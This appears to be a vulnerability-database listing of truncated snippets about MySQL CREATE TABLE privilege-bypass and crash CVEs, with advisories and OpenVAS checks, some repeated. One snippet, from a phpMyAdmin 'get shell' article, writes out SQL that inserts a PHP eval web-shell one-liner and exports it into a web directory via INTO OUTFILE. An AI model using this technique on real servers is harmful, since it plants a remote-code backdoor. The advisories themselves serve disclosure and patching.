CVE-2012-4452

MySQL 5.0.88, and possibly other versions and platforms, allows local users to bypass certain privilege checks by calling CREATE TABLE on a MyISAM table with modified 1 DATA DIRECTORY or 2 INDEX DIRECTORY arguments that are originally associated with pathnames without symlinks, and that can point...

phpmyadmin get shell four ways to summarize and repair-vulnerability warning-the black bar safety net

Method one: CREATE TABLE mysql.study 7on TEXT NOT NULL ; INSERT INTO mysql.study 7on VALUES '? php @eval$POST7on?& gt;'; SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php'; ---- Or more simultaneously executed in the database: mysql create a table named: study, the field for the 7on, the 导出 到...

MySQL: CREATE TABLE ... SELECT causes crash when KILL_BAD_DATA is returned (MySQL Bug#55826)

MySQL 5.0 before 5.0.92, 5.1 before 5.1.51, and 5.5 before 5.5.6 does not properly propagate type errors, which allows remote attackers to cause a denial of service server crash via crafted arguments to extreme-value functions such as 1 LEAST and 2 GREATEST, related to KILLBADDATA and a "CREATE...

Code injection

MySQL 5.0 before 5.0.92, 5.1 before 5.1.51, and 5.5 before 5.5.6 does not properly propagate type errors, which allows remote attackers to cause a denial of service server crash via crafted arguments to extreme-value functions such as 1 LEAST and 2 GREATEST, related to KILLBADDATA and a "CREATE...

CVE-2010-3833

CVE-2010-3833 affects MySQL 5.0/5.1/5.5 where type errors are not properly propagated, enabling remote DoS (server crash) from crafted inputs to functions like LEAST and GREATEST, tied to KILL_BAD_DATA and a CREATE TABLE ... SELECT. The MiracleLinux advisories AXSA:2011-32:01 and AXSA:2010-485:04...

MySQL: CREATE TABLE ... SELECT causes crash when KILL_BAD_DATA is returned (MySQL Bug#55826)

MySQL 5.0 before 5.0.92, 5.1 before 5.1.51, and 5.5 before 5.5.6 does not properly propagate type errors, which allows remote attackers to cause a denial of service server crash via crafted arguments to extreme-value functions such as 1 LEAST and 2 GREATEST, related to KILLBADDATA and a "CREATE...

mysql: incomplete upstream fix for CVE-2008-2079

MySQL before 5.0.67 allows local users to bypass certain privilege checks by calling CREATE TABLE on a MyISAM table with modified 1 DATA DIRECTORY or 2 INDEX DIRECTORY arguments that are originally associated with pathnames without symlinks, and that can point to tables created at a future time a...

MySQL 6.0 < 6.0.9 CREATE TABLE Security Bypass

Binary data 801145.prm...

Oracle MySQL 6.0 < 6.0.9 CREATE TABLE Security Bypass

Binary data 5333.prm...

Mandriva Update for mysql MDVSA-2010:011 (mysql)

Check for the Version of mysql OpenVAS Vulnerability Test Mandriva Update for mysql MDVSA-2010:011 mysql Authors: System Generated Check Copyright: Copyright c 2010 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it and/or modify it under the...

Mandriva Update for mysql MDVSA-2010:012 (mysql)

Check for the Version of mysql OpenVAS Vulnerability Test Mandriva Update for mysql MDVSA-2010:012 mysql Authors: System Generated Check Copyright: Copyright c 2010 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it and/or modify it under the...

MySQL CREATE TABLE调用绕过访问限制漏洞

CVE ID: CVE-2008-7247 MySQL是一款使用非常广泛的开放源代码关系数据库系统，拥有各种平台的运行版本。 当数据主目录包含有到不同文件系统的符号链接时，MySQL的ql/sqltable.cc允许通过认证的远程攻击者通过以特殊DATA DIRECTORY或INDEX DIRECTORY参数调用CREATE TABLE绕过预期的访问限制，执行各种非授权操作。 MySQL AB MySQL 6.0 MySQL AB MySQL 5.1.x MySQL AB MySQL 5.0.x 厂商补丁： MySQL AB --------...

CVE-2009-4030

MySQL 5.1.x before 5.1.41 allows local users to bypass certain privilege checks by calling CREATE TABLE on a MyISAM table with modified 1 DATA DIRECTORY or 2 INDEX DIRECTORY arguments that are originally associated with pathnames without symlinks, and that can point to tables created at a future...

Privilege escalation

MySQL 5.1.x before 5.1.41 allows local users to bypass certain privilege checks by calling CREATE TABLE on a MyISAM table with modified 1 DATA DIRECTORY or 2 INDEX DIRECTORY arguments that are originally associated with pathnames without symlinks, and that can point to tables created at a future...

CVE-2009-4030

MySQL 5.1.x before 5.1.41 allows local users to bypass certain privilege checks by calling CREATE TABLE on a MyISAM table with modified 1 DATA DIRECTORY or 2 INDEX DIRECTORY arguments that are originally associated with pathnames without symlinks, and that can point to tables created at a future...

CVE-2008-7247

sql/sqltable.cc in MySQL 5.0.x through 5.0.88, 5.1.x through 5.1.41, and 6.0 before 6.0.9-alpha, when the data home directory contains a symlink to a different filesystem, allows remote authenticated users to bypass intended access restrictions by calling CREATE TABLE with a 1 DATA DIRECTORY or 2...

Use a low-privileged Oracle database accounts give the OS access permissions-bug warning-the black bar safety net

Author:Mickey These days look at the article called"Penetration: from application down to OS Oracle"of the document,feel quite interesting,the document probably means that is,if the ORACLE service is using the administrator account to start,as long as you have a have resource and connect privileg...

Mandriva Linux Security Advisory : mysql (MDVSA-2008:150)

Multiple buffer overflows in yaSSL, which is used in MySQL, allowed remote attackers to execute arbitrary code CVE-2008-0226 or cause a denial of service via a special Hello packet CVE-2008-0227. Sergei Golubchik found that MySQL did not properly validate optional data or index directory paths...

Mandriva Update for mysql MDVSA-2008:150 (mysql)

Check for the Version of mysql OpenVAS Vulnerability Test Mandriva Update for mysql MDVSA-2008:150 mysql Authors: System Generated Check Copyright: Copyright c 2009 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it and/or modify it under the...

Mandriva Update for mysql MDVSA-2008:150 (mysql)

Check for the Version of mysql OpenVAS Vulnerability Test Mandriva Update for mysql MDVSA-2008:150 mysql Authors: System Generated Check Copyright: Copyright c 2009 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it and/or modify it under the...